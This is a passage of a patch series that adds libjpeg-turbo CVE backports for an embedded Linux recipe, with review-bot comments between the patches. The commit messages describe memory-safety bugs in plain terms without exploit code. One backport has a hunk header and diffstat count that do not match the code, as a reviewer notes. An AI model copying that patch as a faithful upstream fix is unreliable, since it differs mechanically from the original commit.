@@ -0,0 +1,400 @@
1From a46c111d9f3642f0ef3819e7298846ccc61869e0 Mon Sep 17 00:00:00 2001
2From: DRC <information@libjpeg-turbo.org>
3Date: Mon, 27 Jul 2020 14:21:23 -0500
4Subject: [PATCH] Further jpeg_skip_scanlines() fixes
5
6- Introduce a partial image decompression regression test script that
7 validates the correctness of jpeg_skip_scanlines() and
8 jpeg_crop_scanlines() for a variety of cropping regions and libjpeg
9 settings.
10
11 This regression test catches the following issues:
12 #182, fixed in 5bc43c7
13 #237, fixed in 6e95c08
14 #244, fixed in 398c1e9
15 #441, fully fixed in this commit
16
17 It does not catch the following issues:
18 #194, fixed in 773040f
19 #244 (additional segfault), fixed in
20 9120a24
21
22- Modify the libjpeg-turbo regression test suite (make test) so that it
23 checks for the issue reported in #441 (segfault in
24 jpeg_skip_scanlines() when used with 4:2:0 merged upsampling/color
25 conversion.)
26
27- Fix issues in jpeg_skip_scanlines() that caused incorrect output with
28 h2v2 (4:2:0) merged upsampling/color conversion. The previous commit
29 fixed the segfault reported in #441, but that was a symptom of a
30 larger problem. Because merged 4:2:0 upsampling uses a "spare row"
31 buffer, it is necessary to allow the upsampler to run when skipping
32 rows (fancy 4:2:0 upsampling, which uses context rows, also requires
33 this.) Otherwise, if skipping starts at an odd-numbered row, the
34 output image will be incorrect.
35
36- Throw an error if jpeg_skip_scanlines() is called with two-pass color
37 quantization enabled. With two-pass color quantization, the first
38 pass occurs within jpeg_start_decompress(), so subsequent calls to
39 jpeg_skip_scanlines() interfere with the multipass state and prevent
40 the second pass from occurring during subsequent calls to
41 jpeg_read_scanlines().
42
43Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/a46c111d9f3642f0ef3819e7298846ccc61869e0]
44CVE: CVE-2020-35538
45Signed-off-by: Vijay Anusuri <vanusuri@mvista.com>
46---
47 CMakeLists.txt | 9 +++--
48 ChangeLog.md | 15 +++++---
49 croptest.in | 95 ++++++++++++++++++++++++++++++++++++++++++++++++++
50 jdapistd.c | 70 +++++++++++--------------------------
51 libjpeg.txt | 6 ++--
52 5 files changed, 136 insertions(+), 59 deletions(-)
53 create mode 100755 croptest.in
54
55diff --git a/CMakeLists.txt b/CMakeLists.txt
56index aee74c9..de451f4 100644
57--- a/CMakeLists.txt
58+++ b/CMakeLists.txt
59@@ -753,7 +753,7 @@ else()
60 set(MD5_PPM_3x2_IFAST fd283664b3b49127984af0a7f118fccd)
61 set(MD5_JPEG_420_ISLOW_ARI e986fb0a637a8d833d96e8a6d6d84ea1)
62 set(MD5_JPEG_444_ISLOW_PROGARI 0a8f1c8f66e113c3cf635df0a475a617)
63- set(MD5_PPM_420M_IFAST_ARI 72b59a99bcf1de24c5b27d151bde2437)
64+ set(MD5_PPM_420M_IFAST_ARI 57251da28a35b46eecb7177d82d10e0e)
65 set(MD5_JPEG_420_ISLOW 9a68f56bc76e466aa7e52f415d0f4a5f)
66 set(MD5_PPM_420M_ISLOW_2_1 9f9de8c0612f8d06869b960b05abf9c9)
67 set(MD5_PPM_420M_ISLOW_15_8 b6875bc070720b899566cc06459b63b7)
68@@ -1131,7 +1131,7 @@ foreach(libtype ${TEST_LIBTYPES})
69
70 if(WITH_ARITH_DEC)
71 # CC: RGB->YCC SAMP: h2v2 merged IDCT: ifast ENT: arith
72- add_bittest(djpeg 420m-ifast-ari "-fast;-ppm"
73+ add_bittest(djpeg 420m-ifast-ari "-fast;-skip;1,20;-ppm"
74 testout_420m_ifast_ari.ppm ${TESTIMAGES}/testimgari.jpg
75 ${MD5_PPM_420M_IFAST_ARI})
76
77@@ -1266,6 +1266,11 @@ endforeach()
78 add_custom_target(testclean COMMAND ${CMAKE_COMMAND} -P
79 ${CMAKE_CURRENT_SOURCE_DIR}/cmakescripts/testclean.cmake)
80
81+configure_file(croptest.in croptest @ONLY)
82+add_custom_target(croptest
83+ COMMAND echo croptest
84+ COMMAND ${BASH} ${CMAKE_CURRENT_BINARY_DIR}/croptest)
85+
86 if(WITH_TURBOJPEG)
87 configure_file(tjbenchtest.in tjbenchtest @ONLY)
88 configure_file(tjexampletest.in tjexampletest @ONLY)
89diff --git a/ChangeLog.md b/ChangeLog.md
90index 19d18fa..4562eff 100644
91--- a/ChangeLog.md
92+++ b/ChangeLog.md
93@@ -54,11 +54,16 @@ a 16-bit binary PGM file into an RGB image buffer.
94 generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
95 file into an extended RGB image buffer.
96
97-2. Fixed segfaults or "Corrupt JPEG data: premature end of data segment" errors
98-in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or 4:2:0 JPEG
99-images using the merged (non-fancy) upsampling algorithms (that is, when
100-setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a similar fix,
101-but it did not cover all cases.
102+2. Fixed or worked around multiple issues with `jpeg_skip_scanlines()`:
103+
104+ - Fixed segfaults or "Corrupt JPEG data: premature end of data segment"
105+errors in `jpeg_skip_scanlines()` that occurred when decompressing 4:2:2 or
106+4:2:0 JPEG images using merged (non-fancy) upsampling/color conversion (that
107+is, when setting `cinfo.do_fancy_upsampling` to `FALSE`.) 2.0.0[6] was a
108+similar fix, but it did not cover all cases.
109+ - `jpeg_skip_scanlines()` now throws an error if two-pass color
110+quantization is enabled. Two-pass color quantization never worked properly
111+with `jpeg_skip_scanlines()`, and the issues could not readily be fixed.
112
113
114 2.0.3
115diff --git a/croptest.in b/croptest.in
116new file mode 100755
117index 0000000..7e3c293
118--- /dev/null
119+++ b/croptest.in
120@@ -0,0 +1,95 @@
121+#!/bin/bash
122+
123+set -u
124+set -e
125+trap onexit INT
126+trap onexit TERM
127+trap onexit EXIT
128+
129+onexit()
130+{
131+ if [ -d $OUTDIR ]; then
132+ rm -rf $OUTDIR
133+ fi
134+}
135+
136+runme()
137+{
138+ echo \*\*\* $*
139+ $*
140+}
141+
142+IMAGE=vgl_6548_0026a.bmp
143+WIDTH=128
144+HEIGHT=95
145+IMGDIR=@CMAKE_CURRENT_SOURCE_DIR@/testimages
146+OUTDIR=`mktemp -d /tmp/__croptest_output.XXXXXX`
147+EXEDIR=@CMAKE_CURRENT_BINARY_DIR@
148+
149+if [ -d $OUTDIR ]; then
150+ rm -rf $OUTDIR
151+fi
152+mkdir -p $OUTDIR
153+
154+exec >$EXEDIR/croptest.log
155+
156+echo "============================================================"
157+echo "$IMAGE ($WIDTH x $HEIGHT)"
158+echo "============================================================"
159+echo
160+
161+for PROGARG in "" -progressive; do
162+
163+ cp $IMGDIR/$IMAGE $OUTDIR
164+ basename=`basename $IMAGE .bmp`
165+ echo "------------------------------------------------------------"
166+ echo "Generating test images"
167+ echo "------------------------------------------------------------"
168+ echo
169+ runme $EXEDIR/cjpeg $PROGARG -grayscale -outfile $OUTDIR/${basename}_GRAY.jpg $IMGDIR/${basename}.bmp
170+ runme $EXEDIR/cjpeg $PROGARG -sample 2x2 -outfile $OUTDIR/${basename}_420.jpg $IMGDIR/${basename}.bmp
171+ runme $EXEDIR/cjpeg $PROGARG -sample 2x1 -outfile $OUTDIR/${basename}_422.jpg $IMGDIR/${basename}.bmp
172+ runme $EXEDIR/cjpeg $PROGARG -sample 1x2 -outfile $OUTDIR/${basename}_440.jpg $IMGDIR/${basename}.bmp
173+ runme $EXEDIR/cjpeg $PROGARG -sample 1x1 -outfile $OUTDIR/${basename}_444.jpg $IMGDIR/${basename}.bmp
174+ echo
175+
176+ for NSARG in "" -nosmooth; do
177+
178+ for COLORSARG in "" "-colors 256 -dither none -onepass"; do
179+
180+ for Y in {0..16}; do
181+
182+ for H in {1..16}; do
183+
184+ X=$(( (Y*16)%128 ))
185+ W=$(( WIDTH-X-7 ))
186+ if [ $Y -le 15 ]; then
187+ CROPSPEC="${W}x${H}+${X}+${Y}"
188+ else
189+ Y2=$(( HEIGHT-H ));
190+ CROPSPEC="${W}x${H}+${X}+${Y2}"
191+ fi
192+
193+ echo "------------------------------------------------------------"
194+ echo $PROGARG $NSARG $COLORSARG -crop $CROPSPEC
195+ echo "------------------------------------------------------------"
196+ echo
197+ for samp in GRAY 420 422 440 444; do
198+ $EXEDIR/djpeg $NSARG $COLORSARG -rgb -outfile $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}.jpg
199+ convert -crop $CROPSPEC $OUTDIR/${basename}_${samp}_full.ppm $OUTDIR/${basename}_${samp}_ref.ppm
200+ runme $EXEDIR/djpeg $NSARG $COLORSARG -crop $CROPSPEC -rgb -outfile $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}.jpg
201+ runme cmp $OUTDIR/${basename}_${samp}.ppm $OUTDIR/${basename}_${samp}_ref.ppm
202+ done
203+ echo
204+
205+ done
206+
207+ done
208+
209+ done
210+
211+ done
212+
213+done
214+
215+echo SUCCESS!
216diff --git a/jdapistd.c b/jdapistd.c
217index 91da642..c502909 100644
218--- a/jdapistd.c
219+++ b/jdapistd.c
220@@ -306,16 +306,6 @@ noop_quantize(j_decompress_ptr cinfo, JSAMPARRAY input_buf,
221 }
222
223
224-/* Dummy postprocessing function used by jpeg_skip_scanlines() */
225-LOCAL(void)
226-noop_post_process (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
227- JDIMENSION *in_row_group_ctr,
228- JDIMENSION in_row_groups_avail, JSAMPARRAY output_buf,
229- JDIMENSION *out_row_ctr, JDIMENSION out_rows_avail)
230-{
231-}
232-
233-
234 /*
235 * In some cases, it is best to call jpeg_read_scanlines() and discard the
236 * output, rather than skipping the scanlines, because this allows us to
237@@ -329,16 +319,12 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
238 {
239 JDIMENSION n;
240 my_master_ptr master = (my_master_ptr)cinfo->master;
241+ JSAMPARRAY scanlines = NULL;
242 void (*color_convert) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
243 JDIMENSION input_row, JSAMPARRAY output_buf,
244 int num_rows) = NULL;
245 void (*color_quantize) (j_decompress_ptr cinfo, JSAMPARRAY input_buf,
246 JSAMPARRAY output_buf, int num_rows) = NULL;
247- void (*post_process_data) (j_decompress_ptr cinfo, JSAMPIMAGE input_buf,
248- JDIMENSION *in_row_group_ctr,
249- JDIMENSION in_row_groups_avail,
250- JSAMPARRAY output_buf, JDIMENSION *out_row_ctr,
251- JDIMENSION out_rows_avail) = NULL;
252
253 if (cinfo->cconvert && cinfo->cconvert->color_convert) {
254 color_convert = cinfo->cconvert->color_convert;
255@@ -350,23 +336,19 @@ read_and_discard_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
256 cinfo->cquantize->color_quantize = noop_quantize;
257 }
258
259- if (master->using_merged_upsample && cinfo->post &&
260- cinfo->post->post_process_data) {
261- post_process_data = cinfo->post->post_process_data;
262- cinfo->post->post_process_data = noop_post_process;
263+ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
264+ my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
265+ scanlines = &upsample->spare_row;
266 }
267
268 for (n = 0; n < num_lines; n++)
269- jpeg_read_scanlines(cinfo, NULL, 1);
270+ jpeg_read_scanlines(cinfo, scanlines, 1);
271
272 if (color_convert)
273 cinfo->cconvert->color_convert = color_convert;
274
275 if (color_quantize)
276 cinfo->cquantize->color_quantize = color_quantize;
277-
278- if (post_process_data)
279- cinfo->post->post_process_data = post_process_data;
280 }
281
282
283@@ -380,6 +362,12 @@ increment_simple_rowgroup_ctr(j_decompress_ptr cinfo, JDIMENSION rows)
284 {
285 JDIMENSION rows_left;
286 my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
287+ my_master_ptr master = (my_master_ptr)cinfo->master;
288+
289+ if (master->using_merged_upsample && cinfo->max_v_samp_factor == 2) {
290+ read_and_discard_scanlines(cinfo, rows);
291+ return;
292+ }
293
294 /* Increment the counter to the next row group after the skipped rows. */
295 main_ptr->rowgroup_ctr += rows / cinfo->max_v_samp_factor;
296@@ -410,11 +398,16 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
297 my_main_ptr main_ptr = (my_main_ptr)cinfo->main;
298 my_coef_ptr coef = (my_coef_ptr)cinfo->coef;
299 my_master_ptr master = (my_master_ptr)cinfo->master;
300+ my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
301 JDIMENSION i, x;
302 int y;
303 JDIMENSION lines_per_iMCU_row, lines_left_in_iMCU_row, lines_after_iMCU_row;
304 JDIMENSION lines_to_skip, lines_to_read;
305
306+ /* Two-pass color quantization is not supported. */
307+ if (cinfo->quantize_colors && cinfo->two_pass_quantize)
308+ ERREXIT(cinfo, JERR_NOTIMPL);
309+
310 if (cinfo->global_state != DSTATE_SCANNING)
311 ERREXIT1(cinfo, JERR_BAD_STATE, cinfo->global_state);
312
313@@ -472,13 +465,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
314 main_ptr->buffer_full = FALSE;
315 main_ptr->rowgroup_ctr = 0;
316 main_ptr->context_state = CTX_PREPARE_FOR_IMCU;
317- if (master->using_merged_upsample) {
318- my_merged_upsample_ptr upsample =
319- (my_merged_upsample_ptr)cinfo->upsample;
320- upsample->spare_full = FALSE;
321- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
322- } else {
323- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
324+ if (!master->using_merged_upsample) {
325 upsample->next_row_out = cinfo->max_v_samp_factor;
326 upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
327 }
328@@ -493,13 +480,7 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
329 cinfo->output_scanline += lines_left_in_iMCU_row;
330 main_ptr->buffer_full = FALSE;
331 main_ptr->rowgroup_ctr = 0;
332- if (master->using_merged_upsample) {
333- my_merged_upsample_ptr upsample =
334- (my_merged_upsample_ptr)cinfo->upsample;
335- upsample->spare_full = FALSE;
336- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
337- } else {
338- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
339+ if (!master->using_merged_upsample) {
340 upsample->next_row_out = cinfo->max_v_samp_factor;
341 upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
342 }
343@@ -537,14 +518,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
344 cinfo->output_iMCU_row += lines_to_skip / lines_per_iMCU_row;
345 increment_simple_rowgroup_ctr(cinfo, lines_to_read);
346 }
347- if (master->using_merged_upsample) {
348- my_merged_upsample_ptr upsample =
349- (my_merged_upsample_ptr)cinfo->upsample;
350- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
351- } else {
352- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
353+ if (!master->using_merged_upsample)
354 upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
355- }
356 return num_lines;
357 }
358
359@@ -585,13 +560,8 @@ jpeg_skip_scanlines(j_decompress_ptr cinfo, JDIMENSION num_lines)
360 * bit odd, since "rows_to_go" seems to be redundantly keeping track of
361 * output_scanline.
362 */
363- if (master->using_merged_upsample) {
364- my_merged_upsample_ptr upsample = (my_merged_upsample_ptr)cinfo->upsample;
365+ if (!master->using_merged_upsample)
366 upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
367- } else {
368- my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;
369- upsample->rows_to_go = cinfo->output_height - cinfo->output_scanline;
370- }
371
372 /* Always skip the requested number of lines. */
373 return num_lines;
374diff --git a/libjpeg.txt b/libjpeg.txt
375index c50cf90..c233ecb 100644
376--- a/libjpeg.txt
377+++ b/libjpeg.txt
378@@ -3,7 +3,7 @@ USING THE IJG JPEG LIBRARY
379 This file was part of the Independent JPEG Group's software:
380 Copyright (C) 1994-2013, Thomas G. Lane, Guido Vollbeding.
381 libjpeg-turbo Modifications:
382-Copyright (C) 2010, 2014-2018, D. R. Commander.
383+Copyright (C) 2010, 2014-2018, 2020, D. R. Commander.
384 Copyright (C) 2015, Google, Inc.
385 For conditions of distribution and use, see the accompanying README.ijg file.
386
387@@ -750,7 +750,9 @@ multiple rows in the JPEG image.
388
389 Suspending data sources are not supported by this function. Calling
390 jpeg_skip_scanlines() with a suspending data source will result in undefined
391-behavior.
392+behavior. Two-pass color quantization is also not supported by this function.
393+Calling jpeg_skip_scanlines() with two-pass color quantization enabled will
394+result in an error.
395
396 jpeg_skip_scanlines() will not allow skipping past the bottom of the image. If
397 the value of num_lines is large enough to skip past the bottom of the image,
398--
3992.25.1
400
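Review bot: jpeg_skip_scanlines() gets back an unconditional `my_upsample_ptr upsample = (my_upsample_ptr)cinfo->upsample;`, which is the wrong struct type whenever merged upsampling is active, the same mismatch the previous patch in this series removed. Every use visible in these hunks sits behind `if (!master->using_merged_upsample)`, so nothing is dereferenced through the wrong layout here, but the function body continues outside the hunks and a later unguarded `upsample->` would still compile cleanly. I would at least annotate the declaration with `/* valid only when !master->using_merged_upsample; the merged upsampler uses my_merged_upsampler from jdmerge.h */`. Alternatively, the pointer could be left NULL when the flag is set, so that a misuse faults immediately instead of silently writing into the merged upsampler's fields.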
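diff --git a/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
new file mode 100644
index 0000000000..68cf89e628
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2021-46822.patch
@@ -0,0 +1,133 @@
+From f35fd27ec641c42d6b115bfa595e483ec58188d2 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 6 Apr 2021 12:51:03 -0500
+Subject: [PATCH] tjLoadImage: Fix issues w/loading 16-bit PPMs/PGMs
+
+- The PPM reader now throws an error rather than segfaulting (due to a
+ buffer overrun) if an application attempts to load a 16-bit PPM file
+ into a grayscale uncompressed image buffer. No known applications
+ allowed that (not even the test applications in libjpeg-turbo),
+ because that mode of operation was never expected to work and did not
+ work under any circumstances. (In fact, it was necessary to modify
+ TJBench in order to reproduce the issue outside of a fuzzing
+ environment.) This was purely a matter of making the library bow out
+ gracefully rather than crash if an application tries to do something
+ really stupid.
+
+- The PPM reader now throws an error rather than generating incorrect
+ pixels if an application attempts to load a 16-bit PGM file into an
+ RGB uncompressed image buffer.
+
+- The PPM reader now correctly loads 16-bit PPM files into extended
+ RGB uncompressed image buffers. (Previously it generated incorrect
+ pixels unless the input colorspace was JCS_RGB or JCS_EXT_RGB.)
+
+The only way that users could have potentially encountered these issues
+was through the tjLoadImage() function. cjpeg and TJBench were
+unaffected.
+
+CVE: CVE-2021-46822
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/f35fd27ec641c42d6b115bfa595e483ec58188d2.patch]
+Comment: Refreshed hunks from ChangeLog.md
+ Refreshed hunks from rdppm.c
+
+Signed-off-by: Bhabu Bindu <bhabu.bindu@kpit.com>
+
+---
+ ChangeLog.md | 10 ++++++++++
+ rdppm.c | 26 ++++++++++++++++++++------
+ 2 files changed, 30 insertions(+), 6 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index 968969c6b..12e730a0e 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -44,6 +44,15 @@
+ that maximum value was less than 255. libjpeg-turbo 1.5.0 already included a
+ similar fix for binary PPM/PGM files with maximum values greater than 255.
+
++7. The PPM reader now throws an error, rather than segfaulting (due to a buffer
++overrun) or generating incorrect pixels, if an application attempts to use the
++`tjLoadImage()` function to load a 16-bit binary PPM file (a binary PPM file
++with a maximum value greater than 255) into a grayscale image buffer or to load
++a 16-bit binary PGM file into an RGB image buffer.
++
++8. Fixed an issue in the PPM reader that caused incorrect pixels to be
++generated when using the `tjLoadImage()` function to load a 16-bit binary PPM
++file into an extended RGB image buffer.
+
+ 2.0.3
+ =====
+diff --git a/rdppm.c b/rdppm.c
+index c4c937e8a..6ac8fdbf7 100644
+--- a/rdppm.c
++++ b/rdppm.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1991-1997, Thomas G. Lane.
+ * Modified 2009 by Bill Allombert, Guido Vollbeding.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2015-2017, 2020, D. R. Commander.
++ * Copyright (C) 2015-2017, 2020-2021, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -516,6 +516,11 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ register JSAMPLE *rescale = source->rescale;
+ JDIMENSION col;
+ unsigned int maxval = source->maxval;
++ register int rindex = rgb_red[cinfo->in_color_space];
++ register int gindex = rgb_green[cinfo->in_color_space];
++ register int bindex = rgb_blue[cinfo->in_color_space];
++ register int aindex = alpha_index[cinfo->in_color_space];
++ register int ps = rgb_pixelsize[cinfo->in_color_space];
+
+ if (!ReadOK(source->pub.input_file, source->iobuffer, source->buffer_width))
+ ERREXIT(cinfo, JERR_INPUT_EOF);
+@@ -527,17 +532,20 @@ get_word_rgb_row(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[rindex] = rescale[temp];
+ temp = UCH(*bufferptr++) << 8;
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[gindex] = rescale[temp];
+ temp = UCH(*bufferptr++) << 8;
+ temp |= UCH(*bufferptr++);
+ if (temp > maxval)
+ ERREXIT(cinfo, JERR_PPM_OUTOFRANGE);
+- *ptr++ = rescale[temp];
++ ptr[bindex] = rescale[temp];
++ if (aindex >= 0)
++ ptr[aindex] = 0xFF;
++ ptr += ps;
+ }
+ return 1;
+ }
+@@ -624,7 +632,10 @@ start_input_ppm(j_compress_ptr cinfo, cjpeg_source_ptr sinfo)
+ cinfo->in_color_space = JCS_GRAYSCALE;
+ TRACEMS2(cinfo, 1, JTRC_PGM, w, h);
+ if (maxval > 255) {
+- source->pub.get_pixel_rows = get_word_gray_row;
++ if (cinfo->in_color_space == JCS_GRAYSCALE)
++ source->pub.get_pixel_rows = get_word_gray_row;
++ else
++ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+ } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+ cinfo->in_color_space == JCS_GRAYSCALE) {
+ source->pub.get_pixel_rows = get_raw_row;
+@@ -657,7 +657,10 @@
+ cinfo->in_color_space = JCS_EXT_RGB;
+ TRACEMS2(cinfo, 1, JTRC_PPM, w, h);
+ if (maxval > 255) {
+- source->pub.get_pixel_rows = get_word_rgb_row;
++ if (IsExtRGB(cinfo->in_color_space))
++ source->pub.get_pixel_rows = get_word_rgb_row;
++ else
++ ERREXIT(cinfo, JERR_BAD_IN_COLORSPACE);
+ } else if (maxval == MAXJSAMPLE && sizeof(JSAMPLE) == sizeof(U_CHAR) &&
+ (cinfo->in_color_space == JCS_EXT_RGB
+ #if RGB_RED == 0 && RGB_GREEN == 1 && RGB_BLUE == 2 && RGB_PIXELSIZE == 3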
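Review bot: The last rdppm.c hunk in this backport has the header `@@ -657,7 +657,10 @@`, with the same start line on both sides and no function context, although the earlier rdppm.c hunks have already added eleven lines (the preceding header is `@@ -624,7 +632,10 @@`). The header looks hand-refreshed, so the hunk can only be placed by offset search; regenerating the patch from a patched 2.0.4 tree (for example with `git format-patch` or devtool) would give a consistent new-side start and restore the `start_input_ppm` context. The diffstat also lists 10 insertions for ChangeLog.md while that hunk adds 9 lines. None of this changes the code, but a CVE backport that differs mechanically from the upstream commit is harder to check against it, so it is worth confirming after `do_patch` that the `IsExtRGB()` guard landed in the PPM branch.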
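diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
new file mode 100644
index 0000000000..6668f6e41d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-1.patch
@@ -0,0 +1,97 @@
+From 9679473547874c472569d54fecce32b463999a9d Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Tue, 4 Apr 2023 19:06:20 -0500
+Subject: [PATCH] Decomp: Don't enable 2-pass color quant w/ RGB565
+
+The 2-pass color quantization algorithm assumes 3-sample pixels. RGB565
+is the only 3-component colorspace that doesn't have 3-sample pixels, so
+we need to treat it as a special case when determining whether to enable
+2-pass color quantization. Otherwise, attempting to initialize 2-pass
+color quantization with an RGB565 output buffer could cause
+prescan_quantize() to read from uninitialized memory and subsequently
+underflow/overflow the histogram array.
+
+djpeg is supposed to fail gracefully if both -rgb565 and -colors are
+specified, because none of its destination managers (image writers)
+support color quantization with RGB565. However, prescan_quantize() was
+called before that could occur. It is possible but very unlikely that
+these issues could have been reproduced in applications other than
+djpeg. The issues involve the use of two features (12-bit precision and
+RGB565) that are incompatible, and they also involve the use of two
+rarely-used legacy features (RGB565 and color quantization) that don't
+make much sense when combined.
+
+Fixes #668
+Fixes #671
+Fixes #680
+
+CVE: CVE-2023-2804
+Upstream-Status: Backport [https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9679473547874c472569d54fecce32b463999a9d]
+
+Signed-off-by: Peter Marko <peter.marko@siemens.com>
+---
+ ChangeLog.md | 6 ++++++
+ jdmaster.c | 5 +++--
+ jquant2.c | 5 +++--
+ 3 files changed, 12 insertions(+), 4 deletions(-)
+
+diff --git a/ChangeLog.md b/ChangeLog.md
+index e605abe73..de0c4d0dd 100644
+--- a/ChangeLog.md
++++ b/ChangeLog.md
+@@ -1,3 +1,9 @@ quality values.
++9. Fixed an oversight in 1.4 beta1[8] that caused various segfaults and buffer
++overruns when attempting to decompress various specially-crafted malformed
++12-bit-per-component JPEG images using a 12-bit-per-component build of djpeg
++(`-DWITH_12BIT=1`) with both color quantization and RGB565 color conversion
++enabled.
++
+ 2.0.4
+ =====
+
+diff --git a/jdmaster.c b/jdmaster.c
+index b20906438..8d8ef9956 100644
+--- a/jdmaster.c
++++ b/jdmaster.c
+@@ -5,7 +5,7 @@
+ * Copyright (C) 1991-1997, Thomas G. Lane.
+ * Modified 2002-2009 by Guido Vollbeding.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2009-2011, 2016, D. R. Commander.
++ * Copyright (C) 2009-2011, 2016, 2023, D. R. Commander.
+ * Copyright (C) 2013, Linaro Limited.
+ * Copyright (C) 2015, Google, Inc.
+ * For conditions of distribution and use, see the accompanying README.ijg
+@@ -492,7 +492,8 @@ master_selection(j_decompress_ptr cinfo)
+ if (cinfo->raw_data_out)
+ ERREXIT(cinfo, JERR_NOTIMPL);
+ /* 2-pass quantizer only works in 3-component color space. */
+- if (cinfo->out_color_components != 3) {
++ if (cinfo->out_color_components != 3 ||
++ cinfo->out_color_space == JCS_RGB565) {
+ cinfo->enable_1pass_quant = TRUE;
+ cinfo->enable_external_quant = FALSE;
+ cinfo->enable_2pass_quant = FALSE;
+diff --git a/jquant2.c b/jquant2.c
+index 6570613bb..c760380fb 100644
+--- a/jquant2.c
++++ b/jquant2.c
+@@ -4,7 +4,7 @@
+ * This file was part of the Independent JPEG Group's software:
+ * Copyright (C) 1991-1996, Thomas G. Lane.
+ * libjpeg-turbo Modifications:
+- * Copyright (C) 2009, 2014-2015, D. R. Commander.
++ * Copyright (C) 2009, 2014-2015, 2020, 2023, D. R. Commander.
+ * For conditions of distribution and use, see the accompanying README.ijg
+ * file.
+ *
+@@ -1230,7 +1230,8 @@ jinit_2pass_quantizer(j_decompress_ptr cinfo)
+ cquantize->error_limiter = NULL;
+
+ /* Make sure jdmaster didn't give me a case I can't handle */
+- if (cinfo->out_color_components != 3)
++ if (cinfo->out_color_components != 3 ||
++ cinfo->out_color_space == JCS_RGB565)
+ ERREXIT(cinfo, JERR_NOTIMPL);
+
+ /* Allocate the histogram/inverse colormap storage */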
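Review bot: The comment kept above the new condition in the jdmaster.c hunk (`master_selection()`) still reads `/* 2-pass quantizer only works in 3-component color space. */`, which no longer explains the check. RGB565 has three components and is excluded because its pixels are not three samples wide, as the commit message says. A wording such as `/* 2-pass quantizer needs 3 components stored as 3 samples per pixel, so RGB565 is excluded too. */` would keep the reason next to the code, and the guard in the jquant2.c hunk (`jinit_2pass_quantizer()`) could say the same. Because this is a verbatim backport, the comment change belongs upstream rather than in this recipe; both functions start and end outside their hunks.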
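diff --git a/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
new file mode 100644
index 0000000000..bcba0b513d
--- /dev/null
+++ b/meta/recipes-graphics/jpeg/files/CVE-2023-2804-2.patch
@@ -0,0 +1,75 @@
+From 0deab87e24ab3106d5332205f829d1846fa65001 Mon Sep 17 00:00:00 2001
+From: DRC <information@libjpeg-turbo.org>
+Date: Thu, 6 Apr 2023 18:33:41 -0500
+Subject: [PATCH] jpeg_crop_scanline: Fix calc w/sclg + 2x4,4x2 samp
+
+When computing the downsampled width for a particular component,
+jpeg_crop_scanline() needs to take into account the fact that the
+libjpeg code uses a combination of IDCT scaling and upsampling to
+implement 4x2 and 2x4 upsampling with certain decompression scaling
+factors. Failing to account for that led to incomplete upsampling of
+4x2- or 2x4-subsampled components, which caused the color converter to
+read from uninitialized memory. With 12-bit data precision, this caused
+a buffer overrun or underrun and subsequent segfault if the
+uninitialized memory contained a value that was outside of the valid
+sample range (because the color converter uses the value as an array
+index.)
+
+Fixes #669
+
+CVE: CVE-2023-2804
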